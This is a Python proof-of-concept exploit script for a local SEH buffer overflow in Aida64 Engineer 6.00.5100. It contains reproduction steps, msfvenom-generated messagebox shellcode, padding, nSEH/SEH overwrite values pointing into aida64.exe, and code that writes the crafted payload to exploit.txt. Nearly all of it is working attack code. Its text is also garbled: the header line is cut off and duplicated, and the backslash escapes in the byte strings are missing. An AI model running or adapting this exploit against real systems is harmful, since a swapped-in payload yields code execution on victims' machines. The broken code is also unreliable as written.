#!/usr/bin/python
##########################################################################################################
# Exploit : Aida64 6.00.5100 'Log to CSV File' Local #!/usr/bin/python
##########################################################################################################
# Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit
# Author : Nipun Jaswal
# Tested On : Windows 7 Home Basic(x86)
# Version : 6.00.5100
# Release Date : 31/May/2019
# Build : 21/May/2019
# Vendor Homepage: https://www.aida64.com/downloads
# Software Link: https://www.aida64.com/products/aida64-engineer
# CVE : CVE-2019-
##########################################################################################################
##################################Steps to Reproduce######################################################
#1) Open Aida64 Engineer
#2) Navigate to File-> Preferences
#3) Logging --> 'Log Sensor Reading to CSV log File'
#4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field
#5) Press Apply-> OK
#6) Exit the Application via File-->Exit
##########################################//SHELLCODE//###################################################
# msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b 'x00x0ax0d' -f py --smallest
buf = ""
buf += "xb8xb6xf7x5fx31xdaxd5xd9x74x24xf4x5fx2b"
buf += "xc9xb1x42x31x47x14x83xefxfcx03x47x10x54"
buf += "x02x86xdax03x34x4dx39xc7xf6x7cxf3x50xc8"
buf += "x49x90x15x5bx7axd2x5fx90xf1x92x83x23x43"
buf += "x53x30x4dx6cxe8x70x8ax23xf6x09x19xe2x07"
buf += "x20x22xf4x68x49xb1xd3x4cxc6x0fx20x06x8c"
buf += "xa7x20x19xc6x33x9ax01x9dx1ex3bx33x4ax7d"
buf += "x0fx7ax07xb6xfbx7dxf9x86x04x4cxc5x15x56"
buf += "x2bx05x91xa0xf5x4ax57xaex32xbfx9cx8bxc0"
buf += "x1bx75x99xd9xe8xdfx45x1bx05xb9x0ex17x92"
buf += "xcdx4bx34x25x39xe0x40xaexbcx1fxc1xf4x9a"
buf += "xc3xb3x37x50xf3x1ax63x1cxe1xd4x49x77x64"
buf += "xa8x43x64x2axddxc4x8bx34xe2x73x36xcfxa6"
buf += "xfdx61x2dxabx86x8ex96x1ex60x20x29x61x8f"
buf += "xb4x93x96x07xabx77x87x96x5bxbbxf5x36xf8"
buf += "xd3x8cx35x65x56x5fx62xedxcaxbbx9ex67x14"
buf += "x95x61x22xddx93x5fx9dx66x0bxfdx53x25xcb"
buf += "x1dx48x07x3cx42x6fx58x43x14xe0xdfxe4xc4"
buf += "x96x7ex72x61x25xe9x31x0cxdax9axf8x15x94"
buf += "x01xdfxa3x2cx5ax77xe3x7bxd3xd0x6bxcaxc6"
buf += "xaex22xbax56x66xe4x6fx56xb1x8cxdcxbcx4a"
buf += "x05x3dx8dx9ex47xedxbfx4cx98xc1x71xb1x36"
##########################################//SHELLCODE//###################################################
junk= "x41" * (1106 - len(buf))
seh = "x87xe2x1dx01" #0x011de287 - [aida64.exe]
nseh = "xebxf8x90x90"
buffer = junk + buf +"xe9xddxfexffxffxcc" + nseh + seh
handle = open("exploit.txt","w")
handle.write(buffer)
handle.close()
##########################################//END//#########################################################